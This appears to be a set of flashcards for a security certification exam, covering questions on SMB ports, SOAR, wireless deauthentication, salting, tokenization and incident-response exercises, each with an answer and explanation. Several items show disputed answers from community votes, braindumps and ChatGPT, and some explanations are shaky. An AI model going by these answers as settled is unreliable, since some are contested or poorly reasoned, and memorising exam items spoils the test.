A new vulnerability in the SMB protocol on the Windows systems was recently discovered, but no patches are currently available to resolve the issue. The security administrator is concerned that servers in the company’s DMZ will be vulnerable to external attack; however, the administrator cannot disable the service on the servers, as SMB is used by a number of internal systems and applications on the LAN. Which of the following TCP ports should be blocked for all external inbound connections to the DMZ as a workaround to protect the servers? (Choose two.)

a. 135
b. 139
c. 143
d. 161
e. 443
f. 445

A

b. 139
f. 445

Port 139: This port is used for NetBIOS Session Service, which includes SMB over NetBIOS. Blocking this port helps mitigate external SMB-related attacks.

Port 445: This port is used for SMB over TCP. Blocking this port helps prevent external access to SMB services, which mitigates the risk of exploitation through the SMB vulnerability.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
226
Q

A recent phishing campaign resulted in several compromised user accounts. The security incident response team has been tasked with reducing the manual labor of filtering through all the phishing emails as they arrive and blocking the sender’s email address, along with other time-consuming mitigation actions. Which of the following can be configured to streamline those tasks?

a. SOAR playbook
b. MDM policy
c. Firewall rules
d. URL filter
e. SIEM data collection

A

a. SOAR playbook (Security Orchestration, Automation, and Response)

SOAR platforms are designed to automate and orchestrate security operations tasks, including incident response actions like filtering and blocking emails based on predefined rules and playbooks. Here’s how a SOAR playbook can help:

Automated Response Actions: SOAR playbooks can be configured to automatically detect phishing indicators, such as suspicious email patterns or URLs, and then take predefined actions like blocking sender addresses, quarantining emails, or alerting the security team.

Integration with Email Systems: They can integrate with email security solutions or mail servers to perform these actions swiftly and effectively.

Reduction in Manual Effort: By automating these tasks, SOAR reduces the need for manual intervention, thereby saving time and improving response efficiency.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
227
Q

A user reports constant lag and performance issues with the wireless network when working at a local coffee shop. A security analyst walks the user through an installation of Wireshark and gets a five-minute pcap to analyze. The analyst observes the following output:

No. Time Source Destination Protocol Length Info
1234 9.1195665 Sagemcom_87:9f:a3 Broadcast 802.11 38 Deauthentication,
SN=655, FN=0
1235 9.1265649 Sagemcom_87:9f:a3 Broadcast 802.11 39 Deauthentication,
SN=655, FN=0
1236 9.2223212 Sagemcom_87:9f:a3 Broadcast 802.11 38 Deauthentication,
SN=655, FN=0

Which of the following attacks does the analyst MOST likely see in this packet capture?

a. Session replay
b. Evil twin
c. Bluejacking
d. ARP poisoning

A

b. Evil twin

The activity observed in the Wireshark capture, specifically deauthentication frames causing performance issues, aligns most closely with an evil twin attack.

a. Session replay: Involves capturing and replaying legitimate session data to impersonate a user.
b. Evil twin: Involves setting up a rogue wireless access point with the same SSID as a legitimate one to trick users into connecting to it.
c. Bluejacking: Involves sending unsolicited messages to Bluetooth-enabled devices.
d. ARP poisoning: Involves manipulating ARP (Address Resolution Protocol) cache to associate a different MAC address with an IP address.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
228
Q

A security analyst is reviewing the following output from a system:

TCP 192.168.10.10.80 192.168.1.2:60101 TIME_WAIT
TCP 192.168.10.10.80 192.168.1.2:60102 TIME_WAIT
TCP 192.168.10.10.80 192.168.1.2:60103 TIME_WAIT
TCP 192.168.10.10.80 192.168.1.2:60104 TIME_WAIT
TCP 192.168.10.10.80 192.168.1.2:60105 TIME_WAIT
TCP 192.168.10.10.80 192.168.1.2:60106 TIME_WAIT
TCP 192.168.10.10.80 192.168.1.2:60107 TIME_WAIT
TCP 192.168.10.10.80 192.168.1.2:60108 TIME_WAIT
TCP 192.168.10.10.80 192.168.1.2:60109 TIME_WAIT
TCP 192.168.10.10.80 192.168.1.2:60110 TIME_WAIT

Which of the following is MOST likely being observed?

a. ARP poisoning
b. Man in the middle
c. Denial of service
d. DNS poisoning

A

c. Denial of service

The output provided shows multiple TCP connections in the TIME_WAIT state between the IP address 192.168.10.10 on port 80 and the IP address 192.168.1.2 on sequentially increasing ports (60101 to 60110). This pattern is characteristic of a denial of service (DoS) attack where an attacker floods the target system with numerous connection requests, exhausting resources and causing legitimate clients to be unable to connect.

Let’s break down the options:

a. ARP poisoning: This involves manipulating ARP tables to redirect traffic, typically not related to the TCP TIME_WAIT state observed here.

b. Man in the middle: Involves intercepting communications between two parties, which would not typically result in numerous connections in TIME_WAIT state.

c. Denial of service: This matches the observed behavior, where multiple connections are initiated but not fully established due to the overwhelming number of requests.

d. DNS poisoning: Involves corrupting the DNS resolution process to redirect traffic, not directly related to the TCP connections in TIME_WAIT state.

Given the description of numerous TCP connections in TIME_WAIT state from the same source IP on incrementing ports, the most likely scenario being observed is a denial of service (DoS) attack.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
229
Q

Which of the following concepts BEST describes tracking and documenting changes to software and managing access to files and systems?

a. Version control
b. Continuous monitoring
c. Stored procedures
d. Automation

A

a. Version control

Version control systems (VCS) are designed to track changes to files over time, allowing developers (and administrators) to manage and collaborate on projects effectively. It provides mechanisms to:

Track modifications made to files, including who made the changes and when.
Restore previous versions of files if necessary.
Manage access control to ensure that only authorized individuals can make changes.

Continuous monitoring (option b) focuses more on real-time monitoring of systems and applications for security and performance issues rather than managing changes and access control.

Stored procedures (option c) are database-specific and refer to predefined sets of SQL statements stored in the database catalog. They are not directly related to managing changes to software or access to files and systems.

Automation (option d) involves using scripts or tools to perform tasks automatically, which can include version control operations but is broader in scope than just tracking changes and managing access.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
230
Q

A penetration tester is brought on site to conduct a full attack simulation at a hospital. The penetration tester notices a WAP that is hanging from the drop ceiling by its cabling and is reachable. Which of the following recommendations would the penetration tester MOST likely make given this observation?

a. Employ a general contractor to replace the drop-ceiling tiles.
b. Place the network cabling inside a secure conduit.
c. Secure the access point and cabling inside the drop ceiling.
d. Utilize only access points that have internal antennas

A

c. Secure the access point and cabling inside the drop ceiling.

Explanation:

Securing the access point and cabling inside the drop ceiling would involve properly mounting and securing the WAP and its associated cabling within the drop ceiling to prevent physical access by unauthorized individuals.
Hanging WAPs can be easily tampered with or accessed, potentially allowing an attacker to gain physical access to the device, compromise it, or tamper with network traffic.
This recommendation ensures that the WAP is not only functioning securely but also physically protected from tampering or unauthorized access.

The other options do not directly address the immediate security concern of the WAP being physically vulnerable:

Option a (Employ a general contractor to replace the drop-ceiling tiles) is unrelated to securing the WAP.
Option b (Place the network cabling inside a secure conduit) addresses cable management but not the physical security of the WAP itself.
Option d (Utilize only access points that have internal antennas) focuses on antenna types rather than physical security.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
231
Q

Which of the following techniques eliminates the use of rainbow tables for password cracking?

a. Hashing
b. Tokenization
c. Asymmetric encryption
d. Salting

A

d. Salting

Explanation:

Salting involves adding a unique, random string of characters (the salt) to each password before hashing it. This ensures that even if two users have the same password, their hashed passwords will be different due to the unique salts.
Rainbow tables are precomputed tables used to crack hashed passwords efficiently. They map hashed passwords to their plaintext equivalents. However, if salts are used, each password hash will be unique, even if the passwords are the same, thereby thwarting the use of rainbow tables.
Hashing (option a) itself does not prevent the use of rainbow tables unless combined with salting.
Tokenization (option b) and asymmetric encryption (option c) are not directly related to preventing rainbow table attacks on password hashes.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
232
Q

During a security assessment, a security analyst finds a file with overly permissive permissions. Which of the following tools will allow the analyst to reduce the permissions for the existing users and groups and remove the set-user-ID bit from the file?

a. ls
b. chflags
c. chmod
d. lsof
e. setuid

A

c. chmod

Explanation:

chmod (change mode) is a command-line utility in Unix and Unix-like operating systems that allows users to change the permissions (read, write, execute) of files and directories.
It can be used to modify permissions for existing users and groups on a file.
Additionally, chmod can remove the set-user-ID (setuid) bit from a file if necessary, which is a security measure to prevent potential privilege escalation attacks.
The other options:
    ls (option a) is used to list directory contents.
    chflags (option b) is used to change file flags on BSD and macOS systems, not directly related to standard Unix file permissions.
    lsof (option d) lists open files and is used for displaying information about files opened by processes.
    setuid (option e) refers to the set-user-ID bit, which can be set or removed using chmod.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
233
Q

A network administrator is concerned about users being exposed to malicious content when accessing company cloud applications. The administrator wants to be able to block access to sites based on the AUP. The users must also be protected because many of them work from home or at remote locations, providing on-site customer support. Which of the following should the administrator employ to meet these criteria?

a. Implement NAC.
b. Implement an SWG.
c. Implement a URL filter.
d. Implement an MDM.

A

(Community : B 93%)

b. Implement an SWG (Secure Web Gateway).

Here’s why:

SWG (Secure Web Gateway): This solution provides comprehensive web security through functionalities such as URL filtering, content inspection, malware detection, and application controls. It allows administrators to enforce policies that block access to websites based on categories (including malicious sites and those violating the AUP). SWGs can also offer protection regardless of the user's location, whether they are working from home or remotely accessing company resources.

NAC (Network Access Control): NAC is primarily used to control access to the network based on the endpoint's compliance with security policies. While it can restrict network access, it does not typically provide the granular web filtering and content inspection capabilities needed to block specific websites based on AUP or protect against malicious content directly.

URL filter: A URL filter is part of an SWG and can be a component of other security solutions, but alone it does not provide the comprehensive security features of an SWG, such as deep content inspection and malware protection.

MDM (Mobile Device Management): MDM focuses on managing and securing mobile devices, ensuring compliance with security policies, and enabling remote management of device configurations and applications. It does not directly address web security or enforce web access policies.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
234
Q

A website developer is working on a new e-commerce website and has asked an information security expert for the most appropriate way to store credit card numbers to create an easy reordering process. Which of the following methods would BEST accomplish this goal?

a. Salting the magnetic strip information
b. Encrypting the credit card information in transit
c. Hashing the credit card numbers upon entry
d. Tokenizing the credit cards in the database

A

d. Tokenizing the credit cards in the database.

Here’s why tokenization is the preferred approach:

Tokenization: This method replaces sensitive credit card information with a unique identifier (token) that has no exploitable value. The actual credit card data is securely stored in a separate, PCI-compliant vault maintained by a payment processor or gateway. This way, even if the database is compromised, the tokens cannot be reverse-engineered to obtain credit card details.

Salting the magnetic strip information: Salting is a technique used in hashing to add randomness to data before hashing, primarily to prevent dictionary and rainbow table attacks. It's not typically used for credit card information storage because hashing alone doesn't provide the flexibility needed for reordering processes.

Encrypting the credit card information in transit: Encrypting data in transit (using protocols like TLS/SSL) is crucial for securing data while it moves between the user’s browser and the web server. However, it doesn’t directly address the storage of credit card information in the database for reordering purposes.

Hashing the credit card numbers upon entry: Hashing transforms data into a fixed-size string of characters, making it impractical to reverse the process to obtain the original data. However, hashing alone is irreversible, making it unsuitable for storing data that needs to be retrieved or reused (such as for reordering).
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
235
Q

Which of the following supplies non-repudiation during a forensics investigation?

a. Dumping volatile memory contents first
b. Duplicating a drive with dd
c. Using a SHA-2 signature of a drive image
d. Logging everyone in contact with evidence
e. Encrypting sensitive data

A

c. Using a SHA-2 signature of a drive image

Here’s why:

Using a SHA-2 signature of a drive image: Non-repudiation ensures that the authenticity of a digital artifact can be proven and that it has not been altered since it was captured. By generating a SHA-2 hash (or any cryptographic hash) of a drive image, you create a unique digital fingerprint of the data at a specific point in time. If the hash of the image matches the hash taken later, it proves that the drive image has not been altered, providing non-repudiation.

Let’s briefly review the other options:

Dumping volatile memory contents first: This is a good practice for capturing ephemeral data that would be lost if the system were powered down, but it does not provide non-repudiation.

Duplicating a drive with dd: While this is a method of creating a forensic copy of a drive, it does not, by itself, provide non-repudiation. Non-repudiation is about proving that the data has not been altered after duplication.

Logging everyone in contact with evidence: This is part of maintaining the chain of custody, which helps ensure the integrity and accountability of the handling of evidence, but it does not provide non-repudiation by itself.

Encrypting sensitive data: Encryption protects the confidentiality and integrity of data but does not provide non-repudiation unless combined with a method to verify that the data has not been altered, such as hashing.

Therefore, using a SHA-2 signature of a drive image is the best method for providing non-repudiation during a forensics investigation.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
236
Q

A security analyst is tasked with classifying data to be stored on company servers. Which of the following should be classified as proprietary?

a. Customers’ dates of birth
b. Customers’ email addresses
c. Marketing strategies
d. Employee salaries

A

c. Marketing strategies would be classified as proprietary because they involve confidential plans and tactics that provide a competitive edge to the company.

While the other options involve sensitive information, they are generally classified differently based on their sensitivity and potential impact, but not necessarily as proprietary unless specified otherwise by the company’s policies and practices.

a. Customers’ dates of birth: This information is sensitive and could potentially be used for identity theft or other malicious activities. While it’s sensitive, it’s not typically classified as proprietary unless the company explicitly treats it as such for business reasons.

b. Customers’ email addresses: Email addresses are usually considered personal information and are not typically classified as proprietary unless there are specific business reasons to do so.

c. Marketing strategies: Marketing strategies often involve confidential plans and tactics that provide a competitive advantage. Such information is usually classified as proprietary because it directly affects the company’s competitive position.

d. Employee salaries: Employee salaries are sensitive information and are generally classified as confidential rather than proprietary. However, in some cases where salary structures or compensation strategies are proprietary to the company, this information might be classified as proprietary.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
237
Q

Which of the following holds staff accountable while escorting unauthorized personnel?

a. Locks
b. Badges
c. Cameras
d. Visitor logs

A

d. Visitor logs

Here’s why:

Visitor logs: These logs record the details of visitors, including the time of entry, time of exit, the purpose of the visit, and the name of the escorting staff member. By maintaining accurate visitor logs, the organization can track who is responsible for escorting each visitor and hold staff accountable if there are any issues or security breaches involving unauthorized personnel.

Let’s briefly review the other options:

Locks: Locks are physical security controls that restrict access to certain areas. While they are important for securing spaces, they do not hold staff accountable for escorting visitors.

Badges: Badges can identify authorized personnel and visitors, but they do not directly track or hold staff accountable for escorting unauthorized personnel.

Cameras: Cameras can provide visual surveillance and record the movements of people within a facility. While they can be used to review incidents and identify who was involved, they do not inherently hold staff accountable without additional processes in place to review and act on the footage.

Therefore, visitor logs are the most effective means of holding staff accountable for escorting unauthorized personnel.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
238
Q

An organization’s Chief Security Officer (CSO) wants to validate the business’s involvement in the incident response plan to ensure its validity and thoroughness. Which of the following will the CSO MOST likely use?

a. An external security assessment
b. A bug bounty program
c. A tabletop exercise
d. A red-team engagement

A

(Community : C 68%, A 27%)
The reason why option A (an external security assessment) is not the most likely choice for the CSO to validate the business’s involvement in the incident response plan is because an external security assessment focuses on evaluating the overall security posture of an organization, rather than specifically validating the incident response plan

tabletop exercise (C) is specifically designed to test and validate the incident response plan. It allows participants to simulate and discuss their responses to various emergency scenarios, ensuring that the plan is comprehensive and that all stakeholders understand their roles and responsibilities

It’s important to note that while an external security assessment can provide valuable insights into an organization’s security posture, it may not be the most suitable method for validating the incident response plan in this specific scenario.

c. A tabletop exercise

a. An external security assessment: This involves hiring an outside firm to evaluate the organization’s security posture, which can include policies, procedures, and technical controls. While valuable, it does not specifically focus on validating business involvement in the incident response plan.

b. A bug bounty program: This program incentivizes external researchers to find and report vulnerabilities in the organization’s systems. Although it can improve overall security, it does not directly address the business’s involvement in incident response.

c. A tabletop exercise: This is a discussion-based exercise where key stakeholders from the business, including IT and security teams, simulate a security incident scenario. Participants discuss their roles, responsibilities, and actions in response to the scenario, which helps validate and refine the incident response plan. This option directly involves business stakeholders and assesses the thoroughness of their engagement.

d. A red-team engagement: This involves a team of ethical hackers simulating real-world attacks to test the organization’s security defenses. While it provides valuable insights into security weaknesses, it focuses more on technical defenses and less on validating the business’s involvement in incident response.

Conclusion:

c. A tabletop exercise is the most appropriate choice for the CSO to validate the business’s involvement in the incident response plan. It provides a controlled environment where all relevant parties can actively participate, ensuring the plan’s validity and thoroughness are assessed comprehensively.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
239
Q

Which of the following documents provides guidance regarding the recommended deployment of network security systems from the manufacturer?

a. Cloud control matrix
b. Reference architecture
c. NIST RMF
d. CIS Top 20

A

b. Reference architecture

a. Cloud control matrix: This is a framework provided by the Cloud Security Alliance (CSA) that helps organizations assess the risk associated with cloud computing providers. It focuses on cloud security controls rather than specific deployment guidance for network security systems from manufacturers.

b. Reference architecture: This document provides a standardized blueprint or template for the deployment of technology solutions, including network security systems. It often includes best practices and recommendations from the manufacturer on how to deploy and integrate their products within an organization’s infrastructure.

c. NIST RMF (Risk Management Framework): This framework, provided by the National Institute of Standards and Technology (NIST), focuses on managing and mitigating risks in information systems. While it provides guidelines for risk management and security controls, it does not specifically offer deployment guidance for network security systems from manufacturers.

d. CIS Top 20: The Center for Internet Security (CIS) Top 20 Controls are a set of best practices and guidelines for securing an organization’s IT systems and data. They focus on various aspects of cybersecurity but do not provide specific deployment guidance for network security systems from manufacturers.

Conclusion:

b. Reference architecture is the document that provides guidance regarding the recommended deployment of network security systems from the manufacturer. It includes best practices, templates, and recommendations for implementing these systems effectively within an organization’s infrastructure.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
240
Q

During a recent security assessment, a vulnerability was found in a common OS. The OS vendor was unaware of the issue and promised to release a patch within the next quarter. Which of the following BEST describes this type of vulnerability?

a. Legacy operating system
b. Weak configuration
c. Zero day
d. Supply chain

A

c. Zero day

A zero-day vulnerability is a security flaw that is unknown to the software vendor and, consequently, has no available patch or fix at the time of discovery. It is called “zero day” because the developers have had zero days to address and mitigate the issue.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
241
Q

Which of the following is a targeted attack aimed at compromising users within a specific industry or group?

a. Watering hole
b. Typosquatting
c. Hoax
d. Impersonation

A

a. Watering hole

A watering hole attack is a targeted attack aimed at compromising users within a specific industry or group. In this type of attack, the attacker identifies websites that are frequently visited by members of the targeted group and then compromises those sites with malware. When the target users visit the compromised site, their systems become infected, allowing the attacker to gain access to their networks and information.

b. Typosquatting: This attack involves registering domain names that are similar to legitimate websites, relying on users making typographical errors when entering URLs. While it can target specific groups, it is not inherently designed to compromise users within a specific industry or group.

c. Hoax: This is a form of deception that convinces people to believe something that is not true. Hoaxes are generally used to spread misinformation or to trick people into taking actions based on false information. They are not specifically targeted at compromising users within a specific industry or group.

d. Impersonation: This involves pretending to be someone else, often to gain unauthorized access to information or systems. While impersonation can be part of a targeted attack, it doesn’t specifically describe an attack aimed at compromising users within a specific industry or group as a watering hole attack does.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
242
Q

To reduce and limit software and infrastructure costs, the Chief Information Officer has requested to move email services to the cloud. The cloud provider and the organization must have security controls to protect sensitive data. Which of the following cloud services would BEST accommodate the request?

a. IaaS
b. PaaS
c. DaaS
d. SaaS

A

d. SaaS (Software as a Service)
Explanation:

SaaS (Software as a Service): SaaS is a cloud computing service model that delivers software applications over the internet, which are managed by a third-party provider. For email services, SaaS solutions like Microsoft 365 or Google Workspace offer robust email hosting with built-in security features, such as encryption, spam filtering, and data loss prevention. These providers also handle infrastructure and maintenance, reducing costs and complexity for the organization.

Why not the other choices?

IaaS (Infrastructure as a Service): IaaS provides virtualized computing resources over the internet. While IaaS offers flexibility and control over the infrastructure, it requires the organization to manage and maintain the email software and its security. This does not reduce software and infrastructure costs as effectively as SaaS.

PaaS (Platform as a Service): PaaS provides a platform allowing customers to develop, run, and manage applications without dealing with the underlying infrastructure. While PaaS can be used for email services, it typically targets application development and deployment rather than ready-to-use email solutions, making it less suitable for the described need.

DaaS (Desktop as a Service): DaaS provides virtual desktops that users can access from anywhere. It is more focused on delivering a complete desktop environment rather than specific services like email. Thus, it is not the best fit for the requirement to move email services to the cloud specifically.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
243
Q

A security engineer is concerned that the strategy for detection on endpoints is too heavily dependent on previously defined attacks. The engineer would like a tool to monitor for changes to key files and network traffic on the device. Which of the following tools BEST addresses both detection and prevention?

a. NIDS
b. HIPS
c. AV
d. NGFW

A

b. HIPS (Host-based Intrusion Prevention System)
Explanation:

HIPS (Host-based Intrusion Prevention System): HIPS is designed to detect and prevent threats on individual endpoints by monitoring system behavior, including file changes, and analyzing network traffic to and from the host. HIPS can detect and block suspicious activities based on predefined rules and behavior patterns, making it effective for both detection and prevention.

Why not the other choices?

NIDS (Network-based Intrusion Detection System): NIDS monitors network traffic for suspicious activity and anomalies but does not directly monitor or prevent changes to key files on endpoints. It is primarily a detection tool rather than a prevention tool.

AV (Antivirus): Antivirus software is primarily designed to detect and remove known malware based on signature-based detection. While modern AV solutions may include some heuristic and behavioral detection capabilities, they are not as comprehensive in monitoring network traffic and file changes as HIPS.

NGFW (Next-Generation Firewall): NGFWs provide advanced network security features, including intrusion prevention, application awareness, and deep packet inspection. While NGFWs can monitor and block network traffic, they are not focused on endpoint-specific activities like file changes.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
244
Q

During a recent incident, an external attacker was able to exploit an SMB vulnerability over the internet. Which of the following action items should a security analyst perform FIRST to prevent this from occurring again?

a. Check for any recent SMB CVEs.
b. Install AV on the affected server.
c. Block unneeded TCP 445 connections.
d. Deploy a NIDS in the affected subnet.

A

c. Block unneeded TCP 445 connections.
Explanation:

Block unneeded TCP 445 connections: SMB (Server Message Block) uses TCP port 445. Blocking unnecessary inbound connections on this port will immediately mitigate the risk of external attacks exploiting SMB vulnerabilities. This step is crucial because it directly addresses the vector used by the attacker and prevents similar attacks in the future.

Why not the other choices?

Check for any recent SMB CVEs: While it's important to stay updated on recent vulnerabilities (CVEs), this action alone does not prevent exploitation. Blocking the relevant port is a more immediate and effective preventive measure.

Install AV on the affected server: Antivirus software helps detect and remove malware but does not prevent exploitation of SMB vulnerabilities. It is more of a reactive measure rather than a preventive one.

Deploy a NIDS in the affected subnet: A Network Intrusion Detection System (NIDS) can help detect malicious activities and potential exploit attempts, but it does not prevent them. Blocking the port is a more direct and immediate step to prevent exploitation.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
245
Q

A penetration tester is fuzzing an application to identify where the EIP of the stack is located on memory. Which of the following attacks is the penetration tester planning to execute?

a. Race-condition
b. Pass-the-hash
c. Buffer overflow
d. XSS

A

c. buffer overflow attack.
Explanation:

Buffer overflow: In this type of attack, the penetration tester aims to inject more data than a buffer was designed to handle. This overflow can overwrite adjacent memory locations, including critical program control data such as the EIP (Extended Instruction Pointer) on the stack. By carefully crafting the input data (fuzzing), the tester attempts to determine the exact memory location (such as EIP) that can be manipulated to execute arbitrary code or gain control of the application.

Race-condition: This type of attack involves exploiting a flaw in the timing or sequence of events within a system to gain unintended access or privileges, typically by manipulating the order of operations or events.

Pass-the-hash: This is a method used to authenticate to a remote system by using the hash of the user's password instead of the plaintext password.

XSS (Cross-Site Scripting): This attack injects malicious scripts into web applications that are executed in the browsers of other users who visit the affected site.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
246
Q

Server administrators want to configure a cloud solution so that computing memory and processor usage is maximized most efficiently across a number of virtual servers. They also need to avoid potential denial-of-service situations caused by availability. Which of the following should administrators configure to maximize system availability while efficiently utilizing available computing power?

a. Dynamic resource allocation
b. High availability
c. Segmentation
d. Container security

A

a. Dynamic resource allocation

Here’s why:

Dynamic resource allocation: This approach involves automatically distributing computing resources (such as memory and CPU) among virtual servers based on current demand. It ensures that resources are used efficiently, preventing any one server from being overwhelmed while others remain underutilized. This helps to maximize system performance and availability, reducing the risk of denial-of-service situations caused by resource shortages.

Let’s briefly review the other options:

High availability: High availability focuses on ensuring that systems and services are available with minimal downtime, often through redundancy and failover mechanisms. While important for maintaining service availability, it does not directly address the efficient use of computing resources.

Segmentation: Segmentation involves dividing a network into smaller, isolated segments to improve security and manageability. It does not directly impact the efficient use of computing resources or prevent denial-of-service situations related to resource allocation.

Container security: Container security focuses on securing containerized applications and their environments. While important for protecting applications, it does not address the efficient use of memory and processor resources across virtual servers.

Therefore, dynamic resource allocation is the best solution for maximizing system availability and efficiently utilizing available computing power.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
247
Q

While reviewing the wireless router, a systems administrator of a small business determines someone is spoofing the MAC address of an authorized device. Given the table below:

Hostname IP address MAC MAC filter
PC1 192.168.1.20 00:1E:1B;43:21:B2 On
PC2 192.168.1.23 31:1C:3C;13:25:C4 Off
PC3 192.168.1.25 20:A2:22;45:11:D2 On
Unknown 192.168.1.21 12:44:B2;FF:A1:22 Off

Which of the following should be the administrator’s NEXT step to detect if there is a rogue system without impacting availability?

a. Conduct a ping sweep,
b. Physically check each system.
c. Deny internet access to the “UNKNOWN” hostname.
d. Apply MAC filtering.

A

(Community : B 47%, A 45%)
B. Physically check each system

Running a ping sweep isn’t actually going to help you resolve the problem. But if you verify the MAC address of each authorized device you can then apply Mac filtering to allow only the authorized devices. But in order to identify the MAC address for each device you need to physically check each device.

(Brain dump : a. Conduct a ping sweep,)
a: Conduct a ping sweep would be the most practical next step to identify active devices on the network. However, to specifically detect the rogue system with potentially spoofed MAC addresses, the administrator should also consider:

Implementing ARP inspection: This helps to detect and block ARP spoofing, which is often associated with MAC address spoofing.
Using network monitoring tools: Tools that can monitor and analyze network traffic and device behavior for anomalies.

Conduct a ping sweep (option a): This could help identify active devices on the network, but it won’t specifically detect MAC address spoofing unless coupled with ARP inspection or other network monitoring tools.

Physically check each system (option b): While effective, physically checking each system can be time-consuming and may not be feasible if the network is large or remote. It’s not the most efficient immediate step.

Deny internet access to the “UNKNOWN” hostname (option c): This could prevent the potential rogue system from accessing the internet, but it doesn’t address the core issue of identifying and verifying the rogue system.

Apply MAC filtering (option d): This is a viable option because enabling MAC filtering on the router can enforce restrictions based on MAC addresses. However, it’s important to ensure that MAC addresses are correctly identified and updated, as MAC filtering alone won’t detect spoofed MAC addresses.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
248
Q

A security analyst in a SOC has been tasked with onboarding a new network into the SIEM. Which of the following BEST describes the information that should feed into a SIEM solution in order to adequately support an investigation?

a. Logs from each device type and security layer to provide correlation of events
b. Only firewall logs since that is where attackers will most likely try to breach the network
c. Email and web-browsing logs because user behavior is often the cause of security breaches
d. NetFlow because it is much more reliable to analyze than syslog and will be exportable from every device

A

a: Logs from each device type and security layer to provide correlation of events.

Here’s why option a is correct:

Logs from each device type: This includes logs from firewalls, routers, switches, servers, endpoints, and other network infrastructure. Each device type generates logs that capture different aspects of network and system activity.

Security layers: Logs should encompass various security layers such as intrusion detection/prevention systems (IDS/IPS), antivirus solutions, authentication systems, and more. This provides a comprehensive view of security events across different layers of the network.

Correlation of events: SIEM systems excel at correlating events from different sources to detect patterns and anomalies indicative of security incidents. By ingesting logs from diverse device types and security layers, the SIEM can perform effective correlation and alerting, enhancing the SOC's ability to detect and respond to threats.

Option b, c, and d are not as comprehensive or accurate:

Option b: Only focusing on firewall logs would miss potential threats and incidents that occur elsewhere in the network or on endpoints.

Option c: While email and web-browsing logs are important for detecting user-related threats, they do not cover the full spectrum of network activity and security incidents.

Option d: NetFlow is useful for network traffic analysis but is not a replacement for syslog logs, which provide detailed event information crucial for security monitoring and incident response.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
249
Q

An organization just implemented a new security system. Local laws state that citizens must be notified prior to encountering the detection mechanism to deter malicious activities. Which of the following is being implemented?

a. Proximity cards with guards
b. Fence with electricity
c. Drones with alarms
d. Motion sensors with signage

A

d. Motion sensors with signage

Explanation:

The implementation of motion sensors with signage aligns with the requirement to notify citizens prior to encountering the detection mechanism. Motion sensors are commonly used in security systems to detect movement and trigger alarms or alerts. By placing signage indicating the presence of motion sensors, individuals are made aware of their presence before potentially triggering them. This practice not only complies with legal requirements but also serves as a deterrent to malicious activities by notifying individuals of surveillance or monitoring in the area.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
250
Q

An IT security manager requests a report on company information that is publicly available. The manager’s concern is that malicious actors will be able to access the data without engaging in active reconnaissance. Which of the following is the MOST efficient approach to perform the analysis?

a. Provide a domain parameter to theHarvester tool.
b. Check public DNS entries using dnsenum.
c. Perform a Nessus vulnerability scan targeting a public company’s IP.
d. Execute nmap using the options: scan all ports and sneaky mode.

A

a. Provide a domain parameter to the Harvester tool.

Explanation:

TheHarvester is a popular tool used for gathering information from public sources like search engines, PGP key servers, and SHODAN computer databases. By providing a domain parameter to theHarvester, the tool can be directed to search for and gather various types of information associated with the company’s domain name. This could include email addresses, subdomains, hostnames, and open ports, all of which could potentially expose information that malicious actors might use for reconnaissance purposes.

Options b, c, and d involve specific activities like checking DNS entries, performing vulnerability scans on IP addresses, and conducting comprehensive port scans. While these activities are valuable for security assessments, they are not as directly focused on gathering publicly available company information as providing a domain parameter to theHarvester tool would be.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
251
Q

Which of the following environments utilizes dummy data and is MOST likely to be installed locally on a system that allows code to be assessed directly and modified easily with each build?

a. Production
b. Test
c. Staging
d. Development

A

d. Development

Explanation:

Development environment is typically where software developers work on code and applications. It is localized on individual developer systems or a dedicated development server.
In this environment, dummy data (synthetic or placeholder data) is commonly used for testing and debugging purposes.
Developers have the flexibility to assess and modify code easily during the development process, often using version control systems to manage changes.
Unlike production, test, and staging environments, the development environment is less formal and is focused on iterative development and debugging, making it suitable for direct code assessment and frequent modifications.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
252
Q

An analyst receives multiple alerts for beaconing activity for a host on the network. After analyzing the activity, the analyst observes the following activity:

-A user enters comptia.org into a web browser.
-The website that appears is not the comptia.org site.
-The website is a malicious site from the attacker.
-Users in a different office are not having this issue.

Which of the following types of attacks was observed?

a. On-path attack
b. DNS poisoning
c. Locator (URL) redirection
d. Domain hijacking

A

(Braindump: c. Locator (URL) redirection)
DNS Poisoning would affect ALL users in the office. C: is the Only Correct Answer, here.

“Domain Name System (DNS) poisoning happens when fake information is entered into the cache of a domain name server, resulting in DNS queries producing an incorrect reply, sending users to the wrong website. DNS poisoning also goes by the terms “DNS spoofing” and “DNS cache poisoning.”

(Community : B 79%, C 21%)

Chat GPT :
B. DNS poisoning

Here’s why:

DNS poisoning (also known as DNS spoofing) occurs when a malicious actor alters DNS records to redirect traffic from a legitimate site to a malicious one. In this case, when the user enters "comptia.org" into the web browser, they are redirected to a malicious site instead of the legitimate CompTIA website. This redirection happens because the DNS resolution process has been compromised, resulting in the wrong IP address being returned for the legitimate domain.

Let’s briefly review the other options:

On-path attack (formerly known as man-in-the-middle attack): This involves intercepting and potentially altering communication between two parties. While it could result in redirection to a malicious site, it typically involves active interception rather than altering DNS records.

